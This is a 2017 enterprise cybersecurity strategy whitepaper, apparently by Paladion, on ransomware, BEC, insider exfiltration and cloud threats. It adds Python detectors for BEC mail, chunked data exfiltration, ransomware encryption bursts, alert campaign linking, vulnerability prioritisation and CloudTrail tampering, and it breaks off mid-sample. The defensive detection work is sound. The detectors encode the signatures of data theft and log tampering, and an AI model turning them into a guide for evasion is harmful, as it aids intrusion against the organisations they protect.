STRICTLY PRIVATE & CONFIDENTIAL © 2017
Strategies to Combat New,
Innovative Cyber Threats - 2017
Enterprise Security for 2017

Key Cyber Threats to Defend Against in 2017
- Ransomware and its evolving variants
- Compromised business processes
- Increased organizational social engineering
- Insider technical compromises
- Threats to non-perimeter assets

Key Cyber Strategies to Deploy in 2017
- Analytical machine learning based detection
- Enhanced end-point detection
- Orchestrated responses
- Digital VM systems
- CloudOps and DevOps security
New, Innovative Threats to Watch out for

IoT threats
The Mirai botnet (self-propagating IoT malware) and the DDoS attack on Dyn exposed the vulnerability of IoT systems and showed how they can act as a launch pad for other attacks. IoT device usage is expected to rise by 400% in 2017, making this a significant threat. Attacks on IoT devices such as cars, drones and industrial systems should also be considered.

Fake news attacks
The rise in social media and self-publishing, and the shrinking attention span of readers, have caused an increase in the circulation of fake news. This will soon be used for cyber fraud by luring users to act on false information, such as selling stock, and other schemes.

AI & voice-first attacks
As we move beyond touch to voice-based interactions, new forms of attack are likely.
Example #1: tricking AI algorithms with fake data to gain information, and then having the voice-enabled system fool users into performing an action.
Example #2: your banking bot could talk consumers into giving away credentials to attackers.

Smart city attacks
Smart city grids that control transportation, utilities, communication, financial services and other citizen life data will be prone to innovative attacks that leverage a single vector to impact multiple facilities, e.g. using business logic weaknesses to obtain data that enables compromise.

Bionics attacks
Attacks on medical devices such as pacemakers are already being researched. As greater integration of human capability and technology occurs, attacks will become life threatening. 2017 will see more concept-level threats showcased by researchers. The future will see a combination of neuro and cyber weapons as criminals catch on.
Key Threats 2017
Ransomware and Variants

Malware objectives between 2001 and 2017 have expanded to include file deletion, network clogging, botnet creation, data stealing and selling, and data encryption for ransom.

2016 saw a rapid increase in ransomware
- Attacks increased 4 times compared to 2015, aided by more data on end points and easy anonymous payment options.
- Total losses due to ransomware attacks cost over one billion USD, affecting over 100 thousand companies.
- Ransomware variations have also increased: layered infections that include Trojans and key loggers along with ransomware, and selective file and folder encryption.
- Attackers are targeting high-risk sectors such as financial services, healthcare, utilities and SMBs.

2017 will see
- Ransomworm: ransomware combining worm capabilities so that it spreads fast.
- Double dipping: adding data-stealing capabilities along with encryption to double profits, once through ransom from the organization and then through the underground sale of the data.

Refer to the Paladion paper for the top ransomware variants of 2016 and their IOCs for detection.
Business Process Compromise (BPC)

BPC consists of complex attacks that combine social engineering, malware, account takeovers, man-in-the-middle attacks, sniffing and data exfiltration.

Cyber criminals are targeting entire business processes more and more. Attacks on banks target payment processes involving multiple assets, users and intimate transaction knowledge (e.g. the Bangladesh Bank heist). Several copycat attacks on payment systems were reported in the financial sector during 2016. Attackers also targeted inventory management processes, vendor payment processes and supply chain processes.

These attacks have a higher payoff (averaging millions of USD, as opposed to hundreds for ransomware). Larger, more organized cyber crime gangs and rogue nation-state players will be attracted to such attacks. They take more time, skill and knowledge of internal processes, but the pay-off is significantly higher. Global losses are estimated at over 2 billion USD, affecting thousands of organizations.

Organizations' ability to defend themselves is weaker today. The focus is on protecting individual assets and applications, while ignoring attack campaigns on business processes.

2017 prediction: the average value of BPC attacks will go up, causing some organizations to lose tens of millions of USD. The number of affected organizations will still be lower given the effort involved in launching such attacks.
Targeted Business Social Engineering

Business social engineering schemes have included CEO fraud, bogus invoice schemes, legal scare scams, identity takeover of executives and PII data theft.

Social engineering attacks on organizations have increased, with attackers conducting research on employees and company strategies before scamming high-level employees. Attacker research includes social media data, company news releases, technology case studies, and internal data obtained through sniffing. Attackers then target lower-level employees with emails, social media communications and customized website messages.

The majority of BPC attacks involve long campaigns of targeted social engineering. These attacks can also be short, non-technical attacks such as Business Email Compromise (BEC), which saw a rise in 2016. BEC uses knowledge of an organization's internal processes to trick employees into making payments and other transactions on behalf of attackers. The estimated losses from BEC alone were over 3 billion USD in 2016, affecting over fifty thousand organizations globally.

2017 prediction: given the amount of data available online about employees and organizations, this type of attack is easy to carry out. Innovation will no longer be in the technical aspects of an attack, but in the fraud schemes. 2017 will see many variations on tricking employees into giving away data or money.
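BEC, as described above, is non-technical on the attacker's side, but the messages still carry headers that can be scored before they reach accounts payable. The following is an added example, not Paladion's code: it combines the weak signals a BEC mail usually shows (an executive's display name on an address the directory does not know, a Reply-To that diverts answers, a sender domain a character or two away from the corporate one, and payment-change language). The corporate domain, the executive directory and both messages are constructed for the example.

```python
"""Business Email Compromise (BEC) triage on message headers and body.

Added example, not Paladion's code. The corporate domain, the executive
list and both sample messages are constructed.
"""
import re
from email import message_from_string
from email.utils import parseaddr

CORPORATE_DOMAIN = "examplecorp.com"                      # assumed
EXECUTIVES = {"jane doe": "jane.doe@examplecorp.com"}     # assumed directory excerpt
PAYMENT_WORDS = re.compile(
    r"\b(wire transfer|urgent payment|change (?:our|the) bank|new (?:bank )?account|gift cards?)\b",
    re.IGNORECASE)
ALERT_THRESHOLD = 2   # reasons needed before the message is held for review


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a small value between domains means a lookalike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def score_message(raw: str):
    """Return (score, reasons) for one RFC 5322 message (single-part bodies only)."""
    msg = message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    from_dom = _domain(addr)
    reasons = []

    # executive display name, but the address is not the one in the directory
    known = EXECUTIVES.get(name.strip().lower())
    if known and addr.lower() != known:
        reasons.append(f"display name '{name}' on non-directory address {addr}")

    # replies silently go somewhere other than the visible sender
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and _domain(reply_addr) != from_dom:
        reasons.append(f"Reply-To diverts replies to {_domain(reply_addr)}")

    # registered lookalike of the corporate domain (examp1ecorp vs examplecorp)
    if from_dom != CORPORATE_DOMAIN and 0 < edit_distance(from_dom, CORPORATE_DOMAIN) <= 2:
        reasons.append(f"lookalike sender domain {from_dom}")

    payload = msg.get_payload(decode=True)
    body = payload.decode("utf-8", "replace") if payload else ""
    if PAYMENT_WORDS.search(msg.get("Subject", "")) or PAYMENT_WORDS.search(body):
        reasons.append("payment or bank-detail change language")

    return len(reasons), reasons


def is_suspicious(raw: str) -> bool:
    return score_message(raw)[0] >= ALERT_THRESHOLD


# --- constructed messages ----------------------------------------------------
BEC_SAMPLE = """\
From: Jane Doe <jane.doe@examp1ecorp.com>
Reply-To: jane.doe.ceo@webmail-example.net
To: accounts.payable@examplecorp.com
Subject: Urgent payment - confidential

I am in a meeting and cannot take calls. Please process the wire transfer
to the new account details attached before 3pm today.
"""

BENIGN_SAMPLE = """\
From: Jane Doe <jane.doe@examplecorp.com>
To: accounts.payable@examplecorp.com
Subject: Q3 offsite agenda

Attached is the agenda for Thursday. Please circulate to the team.
"""

if __name__ == "__main__":
    for sample in (BEC_SAMPLE, BENIGN_SAMPLE):
        print(score_message(sample))
```

The constructed BEC message trips all four checks; the genuine one trips none. In production the same scoring would also consume the gateway's SPF, DKIM and DMARC results, and a hit should route the mail to a review queue rather than silently drop it, since the executive's real mail from a personal phone can look similar.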
Hi-Tech Insider Abuse

Insider threats have received reduced attention due to the stream of news about external attacks. But insider threats continue to affect organizations, despite their small number compared to external attacks (60% external versus less than 30% internal). Over the past few years, two key controls, data leakage detection and privileged identity management, have contained this threat.

Insider threats continue to rise as the workforce composition changes. Today there is more technical know-how and teleworking, but less organizational empathy. The following attacks will get more sophisticated:
- Data leakage detection bypass through encryption
- Chunking data out through micro-blogging
- Masquerading as normal traffic
- Collaboration with external threat actors

2017 prediction: insider attacks will become as hi-tech as advanced external attacks. These attacks will involve longer campaigns, multiple evasive tools, and co-worker social engineering for credential theft.

Types of incidents (source: Nine Things You Need to Know about Insider Threats): 35% of organizations have experienced at least one insider threat, with the following breakdown (the total does not equal 100% as some respondents had more than one type of incident):
- Data leak: 49%
- Fraud: 41%
- Data breach: 36%
- IP theft: 16%
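"Chunking through micro-blogging" defeats a DLP rule that looks at one request at a time, because each post is tiny. The detector below is an added example, not Paladion's code: it aggregates outbound POSTs per user and destination over a sliding window, so the signal becomes the count of small posts and their combined size. The proxy log lines, the watched hosts and the thresholds are constructed for the example and would be tuned against a real baseline.

```python
"""Detecting chunked exfiltration through micro-blog or paste posts.

Added example, not Paladion's code. Log lines are constructed in a
"timestamp user method host request_bytes" layout.
"""
from collections import defaultdict

WINDOW_SECONDS = 600       # sliding window
MIN_POSTS = 30             # posts per (user, host) inside the window
MAX_CHUNK_BYTES = 2048     # a "small" body: roughly one post or comment
MIN_TOTAL_BYTES = 40_000   # combined body size no one types in ten minutes
WATCHED_HOSTS = {"microblog.example", "paste.example"}   # assumed watchlist


def parse_line(line: str) -> dict:
    ts, user, method, host, nbytes = line.split()
    return {"ts": int(ts), "user": user, "method": method, "host": host, "bytes": int(nbytes)}


def detect_chunked_uploads(lines):
    """Return one finding per (user, host) stream that looks like chunked exfiltration."""
    streams = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        # large single uploads are left to the ordinary per-request DLP size rule
        if rec["method"] == "POST" and rec["host"] in WATCHED_HOSTS and rec["bytes"] <= MAX_CHUNK_BYTES:
            streams[(rec["user"], rec["host"])].append(rec)

    findings = []
    for (user, host), recs in streams.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > WINDOW_SECONDS:
                start += 1
            window = recs[start:end + 1]
            total = sum(r["bytes"] for r in window)
            if len(window) >= MIN_POSTS and total >= MIN_TOTAL_BYTES:
                findings.append({"user": user, "host": host, "window_start": recs[start]["ts"],
                                 "posts": len(window), "total_bytes": total})
                break   # the first qualifying window is enough to raise the case
    return findings


# --- constructed proxy log ---------------------------------------------------
def build_sample_log():
    lines = []
    # normal use: a few short posts, some browsing
    for i in range(5):
        lines.append(f"{1000 + 60 * i} a.lee POST microblog.example 300")
    for i in range(10):
        lines.append(f"{1000 + 30 * i} b.kim GET microblog.example 0")
    # one large upload: caught by the size rule, deliberately not by this detector
    lines.append("1200 c.chen POST paste.example 5000000")
    # insider: 60 posts of 1400 bytes every 8 seconds, 84 kB in eight minutes
    for i in range(60):
        lines.append(f"{2000 + 8 * i} j.smith POST microblog.example 1400")
    return lines


if __name__ == "__main__":
    for f in detect_chunked_uploads(build_sample_log()):
        print(f)
```

The rule fires on the thirtieth post once 42 kB has left in under four minutes, while the five casual posts and the single 5 MB upload are ignored (the latter belongs to the existing volume rule). Encrypted chunks change nothing here: the detector never looks at content, only at count and size, which is what makes it useful against the "bypass through encryption" case listed above.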
Threats to non-perimeter assets

Three trends have already reached a tipping point:
- Teleworking and personal devices used by an increasingly mobile workforce (25% of employees work remotely at least part of the time; 32% have used personal devices in addition to corporate devices)
- A cloud-first strategy for both native cloud and SaaS applications (57% of organizations have cloud assets today; organizations on average have 3 SaaS apps deployed)
- Social media carrying corporate information and marketing activities (corporate data is 40% as likely to be in social media as in internal stores)

Threats to these assets and data outside enterprise perimeters are a reality. Cloud and social media incidents related to corporate data have seen a 70% rise.

Organizations have not formalized risk modeling frameworks for these assets and data. In addition, their on-premise risk mitigation isn't easily transferable: e.g. monitoring for threats in a cloud requires a different architecture and data collection, and existing IPS and SIEM deployments cannot simply be extended to cover cloud assets.

2017 prediction: attacks focused only on non-perimeter assets will increase. Organizations will have a significant delay in discovering them, compared to the average 150 days for on-premises attacks.
Key Strategies 2017
Strategy 1: Analytical and Machine Learning systems

Advanced threats are bypassing rule-based systems. Malware, account takeover attacks, lateral movement, data exfiltration and fraudulent transactions are being modified by attackers to avoid detection.

The typical advanced attack is a long drawn-out campaign, similar to a war with multiple battles within one single attack. Current detection systems are unable to link individual threats into the full campaign, preventing a big-picture view of the attack.

2017 will see organizations adopt more analytical systems with machine learning capabilities and big data storage approaches to solve the latter two problems. Gartner estimates that over 50% of organizations will have security data warehouses with analytics data within the next four years. (For a detailed description of this strategy, refer to the Paladion report on next-gen SOC and security analytics.)

Machine learning analytics will be applied to network analytics, end point analytics, user & entity behavior analytics, and deeper mining of security alerts.

- Use analytical and machine learning based systems for advanced malware and ransomware, slow and low attacks, unknown attack methods, data exfiltration, transaction fraud, and to see long drawn-out campaigns.
Security analytics platform (diagram): a connector layer ingests raw data, context data and alert data; an active discovery layer produces alerts; an active response layer acts on them; a visual layer supports collaboration. Built on big data technology with data sciences:

Machine learning methods
- Outlier algorithms
- Pattern search algorithms
- Association algorithms
- Rare event algorithms

Graph theory
- Link analysis
- Visual analytics

Multi-node streaming rule engine

Data mining
- Statistical & probabilistic modelling
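The "link analysis" item above is the piece that addresses the campaign problem stated in Strategy 1: individual alerts are only a campaign once something joins them. The following is an added example, not Paladion's code, of the simplest form of that linking: alerts that share an entity (host, user, IP, file hash) are merged with union-find, each connected component is a candidate campaign, and the earliest alert in it is patient zero. Entities that appear in almost every alert (a proxy, a domain controller) would merge unrelated incidents, so they are excluded above a degree limit. The alerts are constructed.

```python
"""Linking individual alerts into one attack campaign by shared entities.

Added example, not Paladion's code. The alerts below are constructed.
"""
from collections import defaultdict


class UnionFind:
    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]   # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def link_campaigns(alerts, max_entity_degree=4, min_alerts=2):
    """Group alerts into campaigns.

    Returns a list of campaigns, each a list of alert dicts sorted by timestamp,
    earliest campaign first. Groups smaller than min_alerts are dropped.
    """
    by_entity = defaultdict(list)
    for a in alerts:
        for ent in a["entities"]:
            by_entity[ent].append(a["id"])

    uf = UnionFind()
    for ent, ids in by_entity.items():
        if len(ids) > max_entity_degree:
            continue   # hub entity: shared by everything, so it links nothing useful
        for other in ids[1:]:
            uf.union(ids[0], other)

    by_id = {a["id"]: a for a in alerts}
    groups = defaultdict(list)
    for aid, alert in by_id.items():
        groups[uf.find(aid)].append(alert)
    campaigns = [sorted(g, key=lambda a: a["ts"]) for g in groups.values() if len(g) >= min_alerts]
    return sorted(campaigns, key=lambda c: c[0]["ts"])


def patient_zero(campaign):
    """The earliest alert in a campaign: where the investigation starts."""
    return campaign[0]


# --- constructed alerts ------------------------------------------------------
# "proxy:egress-proxy" is on every alert because every host egresses through it;
# it must not be allowed to merge the two unrelated incidents below.
ALERTS = [
    {"id": "A1", "ts": 100, "type": "phishing_email",
     "entities": {"user:u.patel", "host:wks-17", "proxy:egress-proxy"}},
    {"id": "A2", "ts": 180, "type": "suspicious_process",
     "entities": {"host:wks-17", "hash:9f1c7a", "proxy:egress-proxy"}},
    {"id": "A6", "ts": 300, "type": "failed_logins",
     "entities": {"host:wks-42", "user:m.ortega", "proxy:egress-proxy"}},
    {"id": "A3", "ts": 400, "type": "lateral_movement",
     "entities": {"host:wks-17", "host:fs-02", "proxy:egress-proxy"}},
    {"id": "A4", "ts": 520, "type": "credential_dump",
     "entities": {"host:fs-02", "user:svc-backup", "proxy:egress-proxy"}},
    {"id": "A7", "ts": 650, "type": "suspicious_process",
     "entities": {"host:wks-42", "hash:1b2e4d", "proxy:egress-proxy"}},
    {"id": "A5", "ts": 900, "type": "data_exfil",
     "entities": {"host:fs-02", "ip:203.0.113.9", "proxy:egress-proxy"}},
]

if __name__ == "__main__":
    for c in link_campaigns(ALERTS):
        print([a["id"] for a in c], "patient zero:", patient_zero(c)["id"])
```

With the degree limit in place the seven alerts resolve into two campaigns: the phishing-to-exfiltration chain on wks-17 and fs-02, and a separate pair on wks-42. Raising `max_entity_degree` so the proxy counts as a link collapses everything into one campaign, which is the failure mode the limit exists for; a production version would also time-box links, since a workstation shared by two incidents months apart is not one campaign either.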
Strategy 2: End Point Threat Detection

Organizations have matured via log and network threat monitoring, made possible by wide adoption of SIEM, IPS and network sandboxing technologies. Advanced attackers are now bypassing these technologies by attacking users and their end point devices. DBIR data shows over 40% of today's breaches are caused by end point compromises.

Traditional anti-malware technologies can no longer contain these advanced attacks:
- New malware that bypasses signatures and detects sandboxing
- Malware using scripts and batch files
- Account takeovers via social engineering or privilege escalation attacks on endpoints

Organizations will enable the same 24/7 monitoring for endpoints as is done for networks and logs today. This monitoring will continuously search for threat and compromise indicators on endpoints using a combination of rules, signatures, behavior anomalies and peer profiling.

2017 will see large organizations rolling out EDR technologies and services. IDC estimates that over 80% of organizations will have this capability by 2018. Refer to Paladion's report on IST for more details on how to monitor threats at end points.
Paladion ETDR as a Service (diagram):
1. Endpoints with agents installed
2. Paladion ETDR as a Service: continuous monitoring on endpoints for data leakage, malware activity, user behaviors and lateral movement
3. Fast, accurate, complete detection at scale
4. Analysis and investigation: validate, prioritize, mitigate; IR for alerts
5. Remediation at scale: fix issues quickly and completely
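The ransomware slide earlier lists selective file and folder encryption as a 2016 variation, and this strategy calls for behavior anomalies on endpoints rather than signatures. One behavior rule covers both: ransomware is the one process that touches many files in seconds, writes ciphertext into them and appends a marker extension. The following is an added example, not Paladion's code or its ETDR service, of that rule over endpoint file events. The events are constructed in the shape an EDR agent might report (a content sample per write, source and destination per rename); the thresholds are assumptions.

```python
"""Ransomware-style mass-encryption detection over endpoint file events.

Added example, not Paladion's code. Sample telemetry is constructed.
"""
import math
from collections import defaultdict

WINDOW_SECONDS = 60       # burst window in which the file count is measured
MIN_FILES = 20            # distinct files touched by one process within the window
ENTROPY_THRESHOLD = 7.0   # bits/byte; ciphertext and archives sit near 8, documents far below


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte of `data`; 0.0 for empty input."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def _ext(path: str) -> str:
    name = path.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def detect_ransomware(events):
    """Return one finding per process whose activity looks like mass encryption.

    Trips when, inside WINDOW_SECONDS, a process touches MIN_FILES distinct files
    and either half of its writes are high-entropy or half of its renames apply
    one new extension (the ".locked"-style marker most families leave behind).
    """
    by_proc = defaultdict(list)
    for ev in events:
        if ev["op"] in ("write", "rename"):
            by_proc[ev["process"]].append(ev)

    findings = []
    for proc, evs in by_proc.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > WINDOW_SECONDS:
                start += 1
            window = evs[start:end + 1]
            # a rename is attributed to the file it started from
            touched = {e["src"] if e["op"] == "rename" else e["path"] for e in window}
            if len(touched) < MIN_FILES:
                continue
            high_entropy = sum(
                1 for e in window
                if e["op"] == "write" and shannon_entropy(e["content"]) >= ENTROPY_THRESHOLD)
            new_exts = defaultdict(int)
            for e in window:
                if e["op"] == "rename" and _ext(e["src"]) != _ext(e["path"]):
                    new_exts[_ext(e["path"])] += 1
            marker = max(new_exts, key=new_exts.get) if new_exts else None
            if high_entropy >= MIN_FILES // 2 or (marker is not None and new_exts[marker] >= MIN_FILES // 2):
                findings.append({"process": proc, "window_start": evs[start]["ts"],
                                 "files": len(touched), "high_entropy_writes": high_entropy,
                                 "new_extension": marker})
                break  # one finding per process is enough to open an incident
    return findings


# --- constructed sample telemetry -------------------------------------------
# Stand-in for ciphertext: every byte value appears equally often (8.0 bits/byte).
CIPHERTEXT_SAMPLE = bytes((i * 131 + 17) % 256 for i in range(1024))
DOCUMENT_SAMPLE = b"Quarterly revenue by region: " * 40


def build_sample_events():
    events = []
    # benign: a word processor saving three documents, a user renaming two files
    for i in range(3):
        events.append({"ts": 900 + i, "process": "winword.exe", "op": "write",
                       "path": f"docs/memo{i}.docx", "content": DOCUMENT_SAMPLE})
    for i in range(2):
        events.append({"ts": 950 + i, "process": "explorer.exe", "op": "rename",
                       "src": f"docs/draft{i}.docx", "path": f"docs/final{i}.docx"})
    # malicious: encrypt in place, then append a marker extension; 25 files in 50 s
    for i in range(25):
        events.append({"ts": 1000 + 2 * i, "process": "crypt.exe", "op": "write",
                       "path": f"docs/file{i}.docx", "content": CIPHERTEXT_SAMPLE})
        events.append({"ts": 1001 + 2 * i, "process": "crypt.exe", "op": "rename",
                       "src": f"docs/file{i}.docx", "path": f"docs/file{i}.docx.locked"})
    return events


if __name__ == "__main__":
    for f in detect_ransomware(build_sample_events()):
        print(f)
```

Only `crypt.exe` is reported, on the twentieth file, with both the entropy and the `.locked` evidence attached. Archivers, backup agents and disk encryption tools legitimately write high-entropy data in bulk, so a deployed version needs a process or code-signer allowlist, and the response should be to suspend the process and snapshot the host rather than wait for all files to be touched.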
Strategy 3: Response Automation and Orchestration

Manual incident response is a time-consuming process. The average time for responses involving triage, incident analysis, containment, recovery and eradication is over 35 days. Furthermore, organizations do not have runbooks for handling common incidents, and end up being unprepared for threats.

2017 will see organizations invest in central incident response platforms with automation for the various stages of incident management. Organizations will build or acquire runbooks that integrate with these platforms. The platform will also have analytical capabilities to analyze incidents in depth, uncovering the full blast radius and patient zero for long campaigns.

Forrester estimates that over 37% of organizations are currently planning to automate incident response management through analytics. For more details on how to implement this strategy, refer to Paladion's reports on next-gen SOC and security analytics & orchestration.
Response automation lifecycle (diagram), running 24/7 across the lifecycle:
- Alert validation: verify how relevant the alert is in your context and the likelihood of damage
- Incident analysis: investigate the impact, attacker, attack campaign and extent of compromise
- Containment: quickly contain the attack and its impact to stop the spread
- Root mitigation: design security features to remove root causes and prevent repeat breaches
Strategy 4: Digital VM Programs

Vulnerability management programs in most organizations are slow and cumbersome. Automation of test planning, scheduling, reporting, mitigation, analytics generation and distribution is limited.

Vulnerability results are not prioritized for attack scenarios, i.e. which vulnerability will be exploited in an organization's own context and hence needs faster remediation. There is limited threat intelligence gathering and correlation with vulnerabilities.

Digital VM programs aim to automate analytics and threat intelligence so that vulnerability discovery, mitigation and stakeholder collaboration are fast-tracked. This enables VM programs to run continuously, like existing security monitoring programs: a cycle of discovery, testing, triaging, mitigation and analytics, driven by continuous automated intelligence.

2017 will see organizations implement digital VM programs with a centralized VM platform. Gartner estimates that enterprises that implement a strong vulnerability management process will experience 90% fewer successful attacks.

Refer to Paladion's report on this topic. It's time to stop being complacent about vulnerabilities and execute this strategy.
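The complaint above, that results are not prioritized for the organization's own context, is the triage engine's job. The following is an added example, not Paladion's code, of what that engine computes: the scanner's CVSS score scaled by exploit maturity from a threat-intelligence feed, by the asset's network exposure and by its business criticality, then mapped to an SLA tier. The findings, inventory and feed are constructed (placeholder identifiers stand in for the CVE IDs a real feed keys on), and the weights and tiers are assumptions to tune per organization.

```python
"""Context-aware vulnerability triage: ranking scanner findings by how likely
they are to be exploited here, not by CVSS alone.

Added example, not Paladion's code. All inputs below are constructed.
"""
from dataclasses import dataclass

EXPLOIT_WEIGHT = {"exploited_in_wild": 2.0, "public_poc": 1.5, "none": 1.0}
EXPOSURE_WEIGHT = {"internet": 1.5, "internal": 1.0, "isolated": 0.5}
CRITICALITY_WEIGHT = {"high": 1.5, "medium": 1.0, "low": 0.7}
# (minimum score, tier, remediation SLA in days), highest tier first
SLA_TIERS = ((15.0, "P1", 7), (8.0, "P2", 30), (0.0, "P3", 90))
# an asset the inventory does not know is scored as exposed, never as harmless
UNKNOWN_ASSET = {"exposure": "internet", "criticality": "high"}


@dataclass
class Finding:
    asset: str
    vuln_id: str
    cvss: float


def priority_score(finding: Finding, assets: dict, intel: dict) -> float:
    """CVSS base scaled by exploit maturity, network exposure and asset criticality."""
    ctx = assets.get(finding.asset, UNKNOWN_ASSET)
    maturity = intel.get(finding.vuln_id, "none")
    return (finding.cvss * EXPLOIT_WEIGHT[maturity]
            * EXPOSURE_WEIGHT[ctx["exposure"]] * CRITICALITY_WEIGHT[ctx["criticality"]])


def tier_for(score: float):
    for minimum, tier, days in SLA_TIERS:
        if score >= minimum:
            return tier, days
    return SLA_TIERS[-1][1:]


def prioritize(findings, assets, intel):
    """Return findings ranked highest risk first, each with score, tier and SLA days."""
    ranked = []
    for f in findings:
        score = priority_score(f, assets, intel)
        tier, days = tier_for(score)
        ranked.append({"asset": f.asset, "vuln_id": f.vuln_id, "cvss": f.cvss,
                       "score": round(score, 2), "tier": tier, "sla_days": days,
                       "inventory_gap": f.asset not in assets})
    return sorted(ranked, key=lambda r: r["score"], reverse=True)


# --- constructed inputs ------------------------------------------------------
ASSETS = {
    "pay-gw-01": {"exposure": "internet", "criticality": "high"},
    "lab-vm-07": {"exposure": "isolated", "criticality": "low"},
    "hr-app-02": {"exposure": "internal", "criticality": "medium"},
}
THREAT_INTEL = {"VULN-1": "exploited_in_wild", "VULN-2": "none", "VULN-3": "public_poc"}
FINDINGS = [
    Finding("lab-vm-07", "VULN-2", 9.8),      # top CVSS, but isolated and unexploited
    Finding("pay-gw-01", "VULN-1", 7.5),      # lower CVSS, actively exploited, internet-facing
    Finding("hr-app-02", "VULN-3", 6.5),
    Finding("unknown-host", "VULN-2", 5.0),   # not in inventory: ranked as if exposed
]

if __name__ == "__main__":
    for row in prioritize(FINDINGS, ASSETS, THREAT_INTEL):
        print(row)
```

The CVSS 9.8 finding on the isolated lab host drops to P3 while the 7.5 on the internet-facing payment gateway with an exploit in the wild becomes the only P1, which is the reordering the text asks for. The unknown host is ranked as exposed and flagged with `inventory_gap`, because an asset register that cannot place a host is itself a finding for the asset aggregator.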
Digital VM platform (diagram)

Components: Workflow Management, Vulnerability Analytics, Asset Aggregator, Test Manager, Security Telemetry, Triage Engine, Solution Store, Policy Enforcer.

Roles: Test Administrators, Pen Testers, Vulnerability Analysts, Solution SMEs, Remediators.
Strategy 5: Security for CloudOps and DevOps

Organizations moving to the cloud for their development, in terms of both testing and production systems, will look to integrate security into their CloudOps and DevOps.

DoS attacks are already happening on the cloud. It is the APT kind of attack that will be difficult to detect in a cloud environment, and this can potentially affect multiple tenants simultaneously.

The two main requirements for security will be:
- Speed of controls, given that CloudOps and DevOps are both highly automated in providing resources, changing configurations, and deploying systems and users
- Seamless use of cloud technologies such as the native APIs of cloud providers, configuration management systems such as Chef and Puppet, and ChatOps systems such as Slack

Securing CloudOps and DevOps needs tools that are built differently, whether for security monitoring, vulnerability testing, configuration reviews, or identity and user activity monitoring.

In 2017, organizations will adopt new security architecture and practices to secure cloud assets and a more agile development environment. They will then look at integrating these security processes into their traditional on-premise security management systems for an integrated view.
Cloud Architecture (diagram)

Data sources: CloudTrail, VPC Flow Logs, CloudWatch, IAM, Docker, Windows servers, Unix servers, Amazon console, scanners.
Collection: a collector, a network threat module and automation scripts feed the cloud security platform.
The cloud security platform is integrated with the on-premise SOCs.
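CloudTrail is the first source in the diagram above, and it is the one an on-premise SIEM has no rule content for. The following is an added example, not Paladion's platform code, of the rule layer that would sit in the collector: four detections over a CloudTrail log file for events that matter in the cloud and have no data-centre equivalent (a root console login without MFA, a security group opened to the world on an admin port, CloudTrail logging being switched off, and AdministratorAccess attached to a principal). The log is constructed in the CloudTrail "Records" layout with the field names CloudTrail emits; the account ID, ARNs and IPs are placeholders, and which events to alert on is the example's own choice rather than an AWS-supplied rule set.

```python
"""Detection rules over AWS CloudTrail records for a cloud-native SOC feed.

Added example, not Paladion's code. The sample log is constructed.
"""
import json

ADMIN_PORTS = {22, 3389}
WORLD = {"0.0.0.0/0", "::/0"}
TRAIL_TAMPER = {"StopLogging", "DeleteTrail", "UpdateTrail"}
ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"
ATTACH_EVENTS = {"AttachUserPolicy", "AttachGroupPolicy", "AttachRolePolicy"}


def _items(node):
    """EC2 lists arrive wrapped as {"items": [...]}; tolerate a bare list or None."""
    if isinstance(node, dict):
        return node.get("items", [])
    return node or []


def evaluate(record: dict):
    """Return (rule, detail) hits for one CloudTrail record."""
    hits = []
    name = record.get("eventName", "")
    ident = record.get("userIdentity", {})
    params = record.get("requestParameters") or {}

    if (name == "ConsoleLogin" and ident.get("type") == "Root"
            and record.get("additionalEventData", {}).get("MFAUsed") != "Yes"):
        hits.append(("root_console_login_no_mfa", record.get("sourceIPAddress", "")))

    if name == "AuthorizeSecurityGroupIngress":
        for perm in _items(params.get("ipPermissions")):
            # ipProtocol "-1" (all traffic) carries no ports: treat it as the full range
            lo, hi = int(perm.get("fromPort", 0)), int(perm.get("toPort", 65535))
            ranges = _items(perm.get("ipRanges")) + _items(perm.get("ipv6Ranges"))
            world = any(r.get("cidrIp") in WORLD or r.get("cidrIpv6") in WORLD for r in ranges)
            if world and any(lo <= p <= hi for p in ADMIN_PORTS):
                hits.append(("admin_port_open_to_world", params.get("groupId", "")))

    if record.get("eventSource") == "cloudtrail.amazonaws.com" and name in TRAIL_TAMPER:
        hits.append(("cloudtrail_tampering", name))

    if name in ATTACH_EVENTS and params.get("policyArn") == ADMIN_POLICY:
        target = params.get("userName") or params.get("groupName") or params.get("roleName", "")
        hits.append(("admin_policy_attached", target))

    return hits


def scan_log(raw_json: str):
    """Run every rule over a CloudTrail log file body; returns (eventID, rule, detail)."""
    return [(rec["eventID"], rule, detail)
            for rec in json.loads(raw_json)["Records"]
            for rule, detail in evaluate(rec)]


# --- constructed log in CloudTrail's Records layout ---------------------------
SAMPLE_LOG = json.dumps({"Records": [
    {"eventID": "e1", "eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin",
     "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "Root", "arn": "arn:aws:iam::123456789012:root"},
     "additionalEventData": {"MFAUsed": "No"}},
    {"eventID": "e2", "eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin",
     "sourceIPAddress": "198.51.100.8",
     "userIdentity": {"type": "IAMUser", "userName": "ops.admin"},
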